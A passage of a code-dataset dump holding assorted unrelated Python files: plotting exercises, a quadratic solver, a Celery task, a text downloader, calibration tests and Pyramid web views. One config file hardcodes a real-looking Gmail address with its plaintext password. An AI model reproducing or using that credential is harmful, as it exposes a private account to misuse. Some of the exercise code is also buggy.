(예ㅣ2018-09-05): \")\n lucture_current_pf_2 = input(\"현재 수강 과목이 더 있습니까? (예:y/n): \")\n\n\n quit()\n elif menu_choice ==\"2\":#학생 정보조회\n if file_choice == \"2\":\n print(\"먼저 학생 정보를 입력해야 합니다.\")\n continue\n quit()\n elif menu_choice ==\"3\":#학생 정보수정\n if file_choice == \"2\":\n print(\"먼저 학생 정보를 입력해야 합니다.\")\n continue\n quit()\n elif menu_choice ==\"4\":#학생 정보 삭제\n if file_choice == \"2\":\n print(\"먼저 학생 정보를 입력해야 합니다.\")\n continue\n quit()\n elif menu_choice ==\"5\":#프로그램 종료\n quit()\n else:\n print(\"잘못입력하셨습니다.\")\n continue\n\n\n\n","repo_name":"xsky21/bigdata2019","sub_path":"01_jump to python/CHAP07/4_q/json_exer.py","file_name":"json_exer.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8635192563","text":"import datetime\nfrom celery import Task\nfrom PIL import Image\n\n\nclass ImageResizeTask(Task):\n def __init__(self):\n self.ignore_result = True\n\n def run(self, obj):\n img = Image.open(obj.image)\n img = img.resize((img.size[0]/2, img.size[1]/2), Image.ANTIALIAS)\n obj.image = img\n obj.time_of_end_converting_job = datetime.datetime.now()\n obj.save()\n\n\n","repo_name":"takeiteasyguy/image_resizing","sub_path":"app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69794275768","text":"# log file setting\ntime_format = '%Y_%m_%d_%H_%M_%S'\nserver_log_file_name = \"server\"\nurl_hashing_character_count = 8\n\n# flask server setting\nserver_responses = {\n \"successful_get\": (\n 200\n ),\n \"successful_post\":(\n {\"message\":\"Your request has been received. 
The extracted note will be sent to you shortly\"},\n 200\n ),\n \"failed_post_url\": (\n {\"message\": \"the url provided is not a valid YouTube video address\"},\n 400\n ),\n \"failed_post_email\": (\n {\"message\": \"the email provided is not a valid email address\"},\n 400\n )\n}\n\n# async worker setting\ncelery_backend = 'redis://localhost:6379'\ncelery_broker = 'redis://localhost:6379'\n\n\n# media setting\nmedia_folder = \"../media/\"\nsource_video_file_name = \"source_video\"\ndefault_num_of_video_clip = 3\n\n\n# email setting\nemail_usrname = \"thenote2go@gmail.com\"\nemail_password = \"TheNote2Go\"\nemail_subject = \"Your recipe is ready to go!\"\nemail_body = \"Check out the attached pdf file for your recipe\"","repo_name":"Note2Go/recipe2go","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2975335767","text":"import math\nimport sys\n\ndef main():\n try:\n a, b, c = eval(input(\"Please enter the coefficients (a, b, c): \"))\n disc = b * b - 4 * a * c\n if disc > 0:\n discRoot = math.sqrt(b * b - 4 * a * c)\n root1 = (-b + discRoot) / (2 * a)\n root2 = (-b - discRoot) / (2 * a)\n print(\"\\nThe solutions are:\", root1, root2)\n elif disc == 0:\n root = (-b) / (2 * a)\n print(\"\\nThe solution is:\", root)\n else:\n # print()\n print('\\nThere are no solutions')\n except ValueError as err:\n if 'not enough values to unpack' in str(err):\n print('nije uneto dovoljno vrednosti!')\n elif 'too many values to unpack' in str(err):\n print('uneto previse vrednosti!')\n else:\n print(err)\n except NameError:\n print('vrednosti moraju biti brojevi')\n except SyntaxError:\n print('moraju se uneti vrednosti')\n except ZeroDivisionError:\n print('parametar a ne sme biti 0')\n\n\nmain()","repo_name":"vlaksi/OsnovneRacunarstva-BMI","sub_path":"Predavanja/06 Grananje/Predavanja/primeriSaPredavanja/primer2.py","file_name":"primer2.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19366514469","text":"print(\"Welcome, Basant Bhatt\")\r\n\r\nimport math\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nmass = []\r\nacc = []\r\n\r\nH = 100 ## kg\r\nu = 1/5 ## frictional coefficient\r\nm = 450 ## (Maximum load you want to input + 50 ) \r\n\r\n\r\nfreq = {}\r\namp = {}\r\n\r\nfor i in range(50, m, 50): ## calculation starts from 50kg with the increment of 50kg\r\n \r\n a = (H/i) - u\r\n acc.append(a)\r\n \r\n freq['fre_' + str(i)] = []\r\n amp['amp_' + str(i)] = 1000*[]\r\n \r\n \r\n for j in range (5, 100, 5): ### j is the amplitude\r\n \r\n amp['amp_' + str(i)].append(j)\r\n \r\n f =math.sqrt(a/(j/1000)) / (2 * math.pi )\r\n freq['fre_' + str(i)].append(f)\r\n \r\n \r\n mass.append(i)\r\n\r\n\r\n\r\n### Graph Plotting of the values\r\nfor i in range(50, m, 50):\r\n plt.plot(freq['fre_' + str(i)], amp['amp_' + str(i)], label= (str(i) + \"kg\"))\r\n \r\n\r\nfont = {'family': 'serif', ## Making font styles\r\n 'color': 'black',\r\n 'weight': 'normal',\r\n 'size': 16,\r\n }\r\n \r\n\r\nplt.style.use('fivethirtyeight')\r\n\r\nplt.grid(True) ## shows Major grid lines, automatically\r\nplt.grid(which='minor', alpha = 0.2, linewidth= 0.8) ## Shows minor grid lines between the major grid line\r\nplt.minorticks_on() ## Shows minor tick(|) marks in x&y axies\r\n\r\nplt.axvline(x=0, ymin=0, ymax=0) ## shows the x=0 line in graph\r\nplt.axhline(y=0, 
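# Worked check for the quadratic-formula branches in the solver above: for
# a=1, b=-3, c=2 the discriminant is b*b - 4*a*c = 1 > 0, giving two real
# roots 2.0 and 1.0.
import math

a, b, c = 1, -3, 2
disc = b * b - 4 * a * c
root1 = (-b + math.sqrt(disc)) / (2 * a)
root2 = (-b - math.sqrt(disc)) / (2 * a)
print(disc, root1, root2)  # 1 2.0 1.0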
xmin=0, xmax=0) ## shows the y=0 line in graph\r\n\r\nplt.title(\" Freq vs Amp\", fontdict = font)\r\nplt.xlabel(\"Frequency(Hz)\", fontdict = font)\r\nplt.ylabel(\"Amplitude(mm)\", fontdict = font)\r\n\r\nplt.tight_layout()\r\nplt.legend()\r\n\r\nplt.savefig(\"Freq_vs_amp_with_all_mass.png\")\r\nplt.show()\r\n\r\nprint(\"Thank you Basant Bhatt\")\r\n","repo_name":"BasantBhatt/Shake_Table","sub_path":"freq_vs_amp_for_all_mass.py","file_name":"freq_vs_amp_for_all_mass.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19207530022","text":"# matplotlib\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# ==================================[ matplotlib 실습]==================================\r\n\r\n# 1. Boston 데이터 시각화 실습 문제\r\n#\r\n# 1.1 boston_train.csv 파일을 읽어와서 log plot을 출력하세요\r\n# 'CRIM'과 'MEDV' 컬럼의 데이터를 사용한다\r\n\r\n# 한글패치\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family']='Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\ndf = df.groupby('MEDV').agg(np.mean)\r\n# plt.hist(df)\r\nMEDV = df.index.values\r\nCRIM = df['CRIM'].values\r\npoly = np.polyfit(MEDV,np.log(CRIM),deg=1)\r\nplt.semilogy(MEDV,CRIM,'o')\r\n# plt.semilogy(MEDV,CRIM)\r\nplt.semilogy(MEDV,np.exp(np.polyval(poly,MEDV)))\r\nplt.show()\r\n\r\n\r\n# 1.2 boston_train.csv 파일을 읽어와서 scatter plot을 출력하세요\r\n# # 'CRIM'과 'MEDV','ZN' 컬럼의 데이터를 사용한다\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\ndf = df.groupby('MEDV').agg(np.mean)\r\ngpu = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\ngpu = gpu.groupby('MEDV').agg(np.mean)\r\ngpu\r\ndf2 = pd.merge(df,gpu,how='outer',left_index=True,right_index=True)\r\ndf.mean()\r\n\r\nMEDV = df.index.values\r\nCRIM = df['CRIM'].values\r\nZN = df['ZN'].values\r\nzz = np.log(CRIM)\r\nzz\r\nplt.scatter(MEDV,zz)\r\nplt.show()\r\n\r\nplt.scatter(MEDV,cnt_s = ZN)\r\nplt.show()\r\n\r\n\r\n# 1.4 boston_train.csv파일을 읽어와서 3차원 plot을 출력하세요\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\ndf.columns\r\n\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\n\r\nx = df['CRIM'].values\r\ny = np.where(df['MEDV'].values>0,\r\n np.log(df['MEDV'].values),0)\r\nz = np.where(df['ZN'].values>0,\r\n np.log(df['ZN'].values),0)\r\n\r\nx,y = np.meshgrid(x,y)\r\nz,_=np.meshgrid(z,0)\r\n\r\nax.plot_surface(x,y,z)\r\nax.set_xlabel('CRIM')\r\nax.set_ylabel('MEDV')\r\nax.set_zlabel('ZN')\r\nax.set_title(\"재광's\")\r\nplt.show()\r\n\r\n\r\n# 1.5 boston_train.csv파일을 읽어와서 지연 plot을 출력하세요\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\n\r\n# 1) 풀이\r\nfrom pandas.plotting import lag_plot\r\nlag_plot(np.log(df['MEDV']))\r\nlag_plot(np.log(df['CRIM']))\r\nplt.show()\r\n\r\n# 2) 풀이\r\nlag_plot(np.log(df['MEDV']))\r\nplt.show()\r\n\r\n\r\n# 1.6 boston_train.csv 파일을 읽어와서 자기 상관 plot을 출력하세요\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\nfrom pandas.plotting import autocorrelation_plot\r\nautocorrelation_plot(np.log(df['MEDV']))\r\nplt.show()\r\n\r\n\r\n# 1.7 
boston_train.csv 파일을 읽어와서 pandas를 사용해서\r\n# 전체 컬럼의 box plot과 'TAX' 컬럼의 box plot을 출력하세요\r\n\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\n\r\ndf = np.log(df.values)\r\ndf.plot.box()\r\nplt.show()\r\n\r\n\r\nplt.boxplot(df)\r\n\r\n\r\n\r\n# =======================강사 답안===========================================================\r\n\r\n# matplotlib_실습문제.py\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ndf = pd.read_csv('C:/Users/CPB06GameN/PycharmProjects/GitHub/bigdata/bigdata/파이썬빅데이터분석/boston_train.csv')\r\n\r\n\r\n\r\n# 1.1번 로그플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nprint(type(poly))\r\nprint('Poly',poly[0]) # W, 기울기\r\nprint('Poly',poly[1]) # b, y절편\r\n# plt.plot(crim,np.log(medv),'o')\r\n# plt.show()\r\nplt.semilogy(crim,medv,'o')\r\nplt.semilogy(crim,np.exp(np.polyval(poly,crim)))\r\nplt.title('1.1 Boston crim/zn medv scatter plot')\r\n\r\nplt.show()\r\nprint(df.corr())\r\n\r\n\r\n\r\n\r\n# 1.2번 분산 플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\nzn = df['ZN'].values\r\n\r\n# c: color, s:size, apha:투명도\r\nplt.scatter(crim,medv,c = 200*crim,\r\n s =20 + 200*zn/zn.max(),\r\n alpha = 0.5) # 버블차트\r\n\r\nplt.grid(True)\r\nplt.xlabel('crim')\r\nplt.ylabel('medv')\r\nplt.title('1.2 Boston crim/zn medv scatter plot')\r\nplt.show()\r\n\r\n\r\n\r\n# 1.3 번\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nplt.plot(crim, np.polyval(poly, crim), label='Fit')\r\n\r\nmedv_start = int(medv.mean())\r\nprint(medv_start )\r\ny_ann = np.log(df.at[medv_start, 'MEDV']) - 0.1\r\nprint(y_ann)\r\nann_str = \"Medv Crime\\n %d\" % medv_start\r\nplt.annotate(ann_str, xy=(medv_start, y_ann),\r\n arrowprops=dict(arrowstyle=\"->\"),\r\n xytext=(-30, +70), textcoords='offset points')\r\n\r\ncnt_log = np.log(medv)\r\nplt.scatter(crim, cnt_log, c= 200 * crim,\r\n s=20 + 200 * zn/zn.max(),\r\n alpha=0.5, label=\"Scatter Plot\")\r\nplt.legend(loc='upper right')\r\nplt.grid()\r\nplt.xlabel(\"Crime\")\r\nplt.ylabel(\"Medv\", fontsize=16)\r\nplt.title(\"1.3 Boston Housing : Crime Medv\")\r\nplt.show()\r\n\r\n\r\n# ==============================================================\r\n\r\n# titanic실습과제.py\r\n\r\n# https://kaggle-kr.tistory.com/17\r\n\r\nimport pandas as pd\r\nimport seaborn as sb\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# 한글 출력을 위한 설정\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family']=\"Malgun Gothic\"\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ntitanic = sb.load_dataset('titanic')\r\n\r\n\r\n# 한글 출력을 위한 설정\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family']=\"Malgun Gothic\"\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\ntitanic = sb.load_dataset('titanic')\r\n\r\n# 2.1 생존자와 사망자의 수를 pie 차트로 그리시오(matplotlib)\r\n\r\nsurvived = titanic['survived'][titanic['survived'] == 1].count()\r\n\r\nnot_survived = titanic['survived'][titanic['survived'] ==0].count()\r\ndata = [survived,not_survived]\r\npie_label = ['생존자','사망자']\r\nexp = [0.05,0.05]\r\nplt.figure(figsize=(5,5))\r\nplt.pie(data,labels = pie_label,explode = exp,\r\n autopct ='%.1f%%',shadow = True)\r\nplt.title('2.1 Titanic Survived - Pie Chart')\r\nplt.show()\r\n\r\n\r\n# 2.2 등급별 티켓 
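# The exercises above fit log(y) against x with polyfit(deg=1) and undo the
# log with exp(polyval(...)); a tiny synthetic check that the slope and
# intercept are recovered exactly when the data is log-linear by construction.
import numpy as np

x = np.arange(1, 6, dtype=float)
y = np.exp(0.5 * x + 1.0)            # log(y) = 0.5*x + 1.0 by construction
slope, intercept = np.polyfit(x, np.log(y), deg=1)
print(round(slope, 3), round(intercept, 3))   # 0.5 1.0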
비용(fare)의 평균을 barplot으로 그리시오(seaborn)\r\nsb.barplot('pclass','fare', data=titanic)\r\nplt.title('2.2 Titanic pclass/fare - barplot')\r\nplt.show()\r\n\r\n# 2.3 성(Sex)별 생존자와 사망자의 수를 countplot 으로 그리시오(seaborn)\r\nsb.countplot(data=titanic,x='sex',hue='survived')\r\nplt.title('2.3 Titanic Survived/sex - countplot')\r\nplt.show()\r\n\r\n\r\n# 2.4 상관 관계 heatmap을 출력하시요 (seaborn)\r\nplt.figure(figsize=(10, 10))\r\nsb.heatmap(titanic.corr(), linewidths=0.01, square=True,\r\n annot=True, cmap=plt.cm.viridis, linecolor=\"white\")\r\nplt.title('2.4 Titanic Correlation between features')\r\nplt.show()\r\n\r\n# 2.5 나이(age) 분포도(distplot)를 그리시오 (seaborn)\r\n# 결측치는 평균값으로 수정\r\ntitanic = titanic.fillna(titanic.mean())\r\nsb.distplot(titanic['age'])\r\nplt.title('2.5 Titanic age - distplot')\r\nplt.show()\r\n\r\n\r\n# 2.6 객실의 등급(pclass)별 'age'의 분포를 boxplot으로 그리시오(seaborn)\r\ntitanic = sb.load_dataset('titanic')\r\n\r\nsb.boxplot(data=titanic, x='pclass',y='age')\r\n\r\ndf = titanic.groupby('pclass')\r\nmed = df.agg([np.median])\r\nr = med['age']\r\nt0 = r['median'].values[0]\r\nt1 = r['median'].values[1]\r\nt2 = r['median'].values[2]\r\nplt.text(0,t0, round(t0,2))\r\nplt.text(1,t1, round(t1,2))\r\nplt.text(2,t2, round(t2,2))\r\n\r\nplt.title('2.6 Titanic pclass/age - boxplot')\r\nplt.show()","repo_name":"kjkjv/python","sub_path":"matplotlib.py","file_name":"matplotlib.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35615924837","text":"n = int(input())\nmax = 0\nc = 0\nfor i in range(n):\n a, b = [int(i) for i in input().split()]\n c -= a\n c += b\n if max < c:\n max = c\nprint(max)\n","repo_name":"ciberdiego123/python-coding","sub_path":"code_python/tram.py","file_name":"tram.py","file_ext":"py","file_size_in_byte":160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41556902819","text":"import logging\n\nLOG_FILENAME = 'example.log'\nlogging.basicConfig(filename=LOG_FILENAME, level=logging.DEBUG, filemode='w')\n# create logger\nlogger = logging.getLogger(\"simple_example\")\nlogger.setLevel(logging.DEBUG)\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n# create formatter\nformatter = logging.Formatter(\"%(levelname)s - %(message)s\")\n\n# \"application\" code\nlogger.info(\" info message\")\nlogger.warn(\" warn message\")\n\n","repo_name":"12leclarkson/shaft_design","sub_path":"logging_test.py","file_name":"logging_test.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42363660722","text":"############ NATIVE IMPORTS ###########################f\nfrom os import system\n############ INSTALLED IMPORTS ###########################\n############ LOCAL IMPORTS ###########################\n##########################################################\ndef download_tanakh():\n PATH_TO_SAVE = \"tanakh/{cannon}/{book}_{language_code}.json\"\n LANGUAGES = (\"English\",\"Hebrew\")\n CANNON_BOOKS_MAP = {\n \"Torah\":[\"Deuteronomy\",\"Exodus\",\"Genesis\",\"Leviticus\",\"Numbers\"],\n \"Prophets\":[\n \"Amos\",\"Ezekiel\",\"Habakkuk\",\"Haggai\",\"Hosea\",\n \"I%20Kings\",\"I%20Samuel\",\"II%20Kings\",\"II%20Samuel\",\n \"Isaiah\",\"Jeremiah\",\"Joel\",\"Jonah\",\"Joshua\",\n \"Judges\",\"Malachi\",\"Micah\",\"Nahum\",\"Obadiah\",\n \"Zechariah\",\"Zephaniah\"\n ],\n \"Writings\":[\n 
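# The day-1 counter above compares raw file lines, which are strings, so the
# comparison is lexicographic; a hedged sketch of the same count with explicit
# int conversion, pairing each depth with its successor via zip.
with open('input.txt', 'r') as f:
    depths = [int(line) for line in f if line.strip()]
increases = sum(1 for prev, cur in zip(depths, depths[1:]) if cur > prev)
print("Vyslo nam zde {}".format(increases))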
\"Daniel\",\"Ecclesiastes\",\"Esther\",\"Ezra\",\n \"I%20Chronicles\",\"II%20Chronicles\",\"Job\",\n \"Lamentations\",\"Nehemiah\",\"Proverbs\",\n \"Psalms\",\"Ruth\",\"Song%20of%20Songs\"\n ]\n }\n URL = \"https://raw.githubusercontent.com/Sefaria/Sefaria-Export/master/json/Tanakh/{cannon}/{book}/{language}/merged.json\"\n\n for cannon,books in CANNON_BOOKS_MAP.items():\n for book in books:\n for language in LANGUAGES:\n url = URL.format(\n cannon=cannon,\n book=book,\n language=language\n )\n path_to_save = PATH_TO_SAVE.format(\n cannon=cannon.lower(),\n book=book.lower(),\n language_code = language[:2].lower()\n )\n system(f\"curl {url} --output {path_to_save}\")\n\ndef download_kabbalah():\n PATH_TO_SAVE = \"kabbalah/{book}_{language_code}.json\"\n LANGUAGES = (\"English\",\"Hebrew\")\n BOOKS = (\"Zohar\",\"Sefer%20Yetzirah\")\n URL = \"https://raw.githubusercontent.com/Sefaria/Sefaria-Export/master/json/Kabbalah/{book}/{language}/merged.json\"\n\n for book in BOOKS:\n for language in LANGUAGES:\n url = URL.format(\n book=book,\n language=language\n )\n path_to_save = PATH_TO_SAVE.format(\n book=book.lower(),\n language_code = language[:2].lower()\n )\n system(f\"curl {url} --output {path_to_save}\")\n","repo_name":"mohammedterryjack/quran-data","sub_path":"raw_data/download_sefaria.py","file_name":"download_sefaria.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19536178081","text":"\n\n\n#%% imports\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport os\n\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.metrics import classification_report\n\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.calibration import calibration_curve\n\n\n# ##################\n# Messed around with proba calibration stuff\n# didn't find much interesting\n\n\n\n\n\n#%% data\n\ndata_X, data_Y = load_iris(return_X_y = True)\n\ndata_Y = (data_Y == 1).astype(int)\n\n\n\n\n#%% \n\n\n\nmodels_base = [LogisticRegression(), GaussianNB(), RandomForestClassifier(), SVC(probability = True)]\n\n# TRAIN TEST\n\nsss = StratifiedShuffleSplit(n_splits = 1, test_size = 0.2)\n\nfor train_index, test_index in sss.split(data_X, data_Y):\n X_train, Y_train = data_X[train_index], data_Y[train_index]\n X_test, Y_test = data_X[test_index], data_Y[test_index]\n#\n\n# TRAIN VAL CV + CALIBRATION\n\nsss = StratifiedShuffleSplit(n_splits = 5, test_size = 0.2)\n\nfor train_index, val_index in sss.split(X_train, Y_train):\n print('######## Fold')\n X_t, Y_t = X_train[train_index], Y_train[train_index]\n X_val, Y_val = X_train[val_index], Y_train[val_index]\n \n for model in models_base:\n print(model)\n plt.figure(figsize = (10, 10))\n plt.title(model)\n #\n temp_model = model.fit(X_t, Y_t)\n #//\n print('**')\n print(f'Base Val Score : {temp_model.score(X_test, Y_test):0.2}')\n y_pred = temp_model.predict_proba(X_test)[:, 1]\n prob_true, prob_pred = calibration_curve(Y_test, y_pred, n_bins=10)\n plt.plot(prob_pred, prob_true, marker='.', label = 'base')\n print(classification_report(Y_test, y_pred >= 0.5))\n #\\\\\n \n temp_calibrated = CalibratedClassifierCV(base_estimator = temp_model, \n method = 'sigmoid', \n cv = 'prefit').fit(X_val, Y_val)\n #//\n 
print('**')\n print(f'Sig Calibrated Val Score : {temp_calibrated.score(X_test, Y_test):0.2}')\n y_pred = temp_calibrated.predict_proba(X_test)[:, 1]\n prob_true, prob_pred = calibration_curve(Y_test, y_pred, n_bins=10)\n plt.plot(prob_pred, prob_true, marker='.', label = 'sig calib')\n print(classification_report(Y_test, y_pred >= 0.5))\n #\\\\\n \n temp_calibrated = CalibratedClassifierCV(base_estimator = temp_model, \n method = 'isotonic', \n cv = 'prefit').fit(X_val, Y_val)\n #//\n print('**')\n print(f'Iso Calibrated Val Score : {temp_calibrated.score(X_test, Y_test):0.2}')\n y_pred = temp_calibrated.predict_proba(X_test)[:, 1]\n prob_true, prob_pred = calibration_curve(Y_test, y_pred, n_bins=10)\n plt.plot(prob_pred, prob_true, marker='.', label = 'iso calib')\n print(classification_report(Y_test, y_pred >= 0.5))\n #\\\\\n \n print('')\n \n plt.plot([0, 1], [0, 1], linestyle='--')\n plt.legend(loc = 'best')\n plt.show()\n #\n#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yoann-ba/utils_misc","sub_path":"tests_calibration_proba.py","file_name":"tests_calibration_proba.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43212172727","text":"from typing import Union\n\nfrom dataclasses_json import config\n\nfrom chainpy.eth.ethtype.exceptions import EthNotHex\nfrom chainpy.eth.ethtype.hexbytes import EthHexBytes, EthHashBytes, EthAddress\nfrom chainpy.eth.ethtype.utils import is_hex\n\n\"\"\"\n{TYPE}Meta - store value as a specific \"TYPE\"\n- decoder: importing function\n- encoder: exporting function\n\"\"\"\n\n\ndef hex_to_int(value: Union[str, int]) -> int:\n if isinstance(value, int):\n return value\n if is_hex(value):\n ret = int(value, 16)\n return ret\n # return int(value, 16)\n raise EthNotHex(type(value))\n\n\nIntegerMeta = config(\n decoder=lambda value: hex_to_int(value) if value is not None and value != \"\" else None,\n encoder=lambda value: hex(value) if value is not None else None\n)\n\nEthHexBytesMeta = config(\n decoder=lambda value: EthHexBytes(value),\n encoder=lambda value: value.hex() if value is not None else None\n)\n\nEthHexBytesListMeta = config(\n decoder=lambda values: [EthHexBytes(value) for value in values],\n encoder=lambda values: [value.hex() for value in values]\n)\n\nEthHashBytesMeta = config(\n decoder=lambda value: EthHashBytes(value),\n encoder=lambda value: value.hex() if value is not None else None\n)\n\nEthHashBytesListMeta = config(\n decoder=lambda values: [EthHashBytes(value) for value in values],\n encoder=lambda values: [value.hex() for value in values]\n)\n\nEthAddrMeta = config(\n decoder=lambda value: EthAddress(value),\n encoder=lambda value: value.hex() if value is not None else None\n)\n\nEthAddrListMeta = config(\n decoder=lambda values: [EthAddress(value) for value in values],\n encoder=lambda values: [value.hex() for value in values]\n)\n","repo_name":"bifrost-platform/bifrost-python-lib","sub_path":"chainpy/eth/ethtype/dataclassmeta.py","file_name":"dataclassmeta.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"3750437632","text":"import tempfile\nimport itertools\n\nfrom pyramid.httpexceptions import HTTPFound\nfrom pyramid.view import view_config\nfrom pyramid.url import 
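# Minimal usage sketch for the field metadata defined above: attach
# IntegerMeta to a dataclass field so hex strings decode to int and encode
# back to hex. The class name is illustrative and IntegerMeta is assumed to
# be in scope from the module above.
from dataclasses import dataclass, field
from dataclasses_json import dataclass_json

@dataclass_json
@dataclass
class BlockRef:
    number: int = field(metadata=IntegerMeta)

ref = BlockRef.from_dict({"number": "0x10"})
print(ref.number)        # 16
print(ref.to_dict())     # {'number': '0x10'}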
route_url\nfrom pyramid.renderers import render_to_response\nfrom pyramid.response import Response\n\nfrom OSMTM.models import DBSession\nfrom OSMTM.models import Job\nfrom OSMTM.models import User\nfrom OSMTM.models import Tile\nfrom OSMTM.models import TileHistory\nfrom OSMTM.models import Tag\nfrom OSMTM.models import License\n\nfrom OSMTM.views.views import EXPIRATION_DURATION, checkTask\nfrom OSMTM.views.tasks import get_locked_task\n\nfrom OSMTM.utils import parse_float\n\nfrom shapely.wkt import loads\n\nfrom geojson import Feature, FeatureCollection\nfrom geojson import dumps\n\nimport simplejson\n\nfrom sqlalchemy.sql.expression import and_\n\nfrom pyramid.security import authenticated_userid\n\nfrom paste.fileapp import FileApp\n\nimport logging\nlog = logging.getLogger(__name__)\n\n@view_config(route_name='job', renderer='job.mako', permission='job',\n http_cache=0)\ndef job(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n if job is None:\n request.session.flash(\"Sorry, this job doesn't exist\")\n return HTTPFound(location = route_url('home', request))\n\n for tile in job.tiles:\n checkTask(tile)\n\n username = authenticated_userid(request)\n user = session.query(User).get(username)\n\n current_task = get_locked_task(id, username)\n\n admin = user.is_admin() if user else False\n return dict(job=job, user=user,\n bbox=loads(job.geometry).bounds,\n tile=current_task,\n admin=admin,\n )\n\n@view_config(route_name='job_stats', renderer='json', permission='job',\n http_cache=0)\ndef job_stats(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n\n return get_stats(job)\n\n@view_config(route_name='job_contributors', renderer='json', permission='job',\n http_cache=0)\ndef job_contributors(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n\n return get_users(job)\n\n@view_config(route_name='job_user', renderer='json', permission='job',\n http_cache=0)\ndef job_user(request):\n id = request.matchdict['job']\n user = request.matchdict['user']\n session = DBSession()\n job = session.query(Job).get(id)\n\n return get_tiles_for_user(job, user)\n\n@view_config(route_name='job_geom', renderer='geojson', permission='edit')\ndef job_geom(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n return FeatureCollection([Feature(id=id, geometry=loads(job.geometry))])\n\n@view_config(route_name='job_tiles', renderer='geojson', permission='edit')\ndef job_tiles(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n tiles = []\n for tile in job.tiles:\n tiles.append(Feature(geometry=tile.to_polygon(),\n id=str(tile.x) + '-' + str(tile.y) + '-' + str(tile.zoom)))\n return FeatureCollection(tiles)\n\n@view_config(route_name='job_tiles_status', renderer='json', permission='edit')\ndef job_tiles_status(request):\n id = 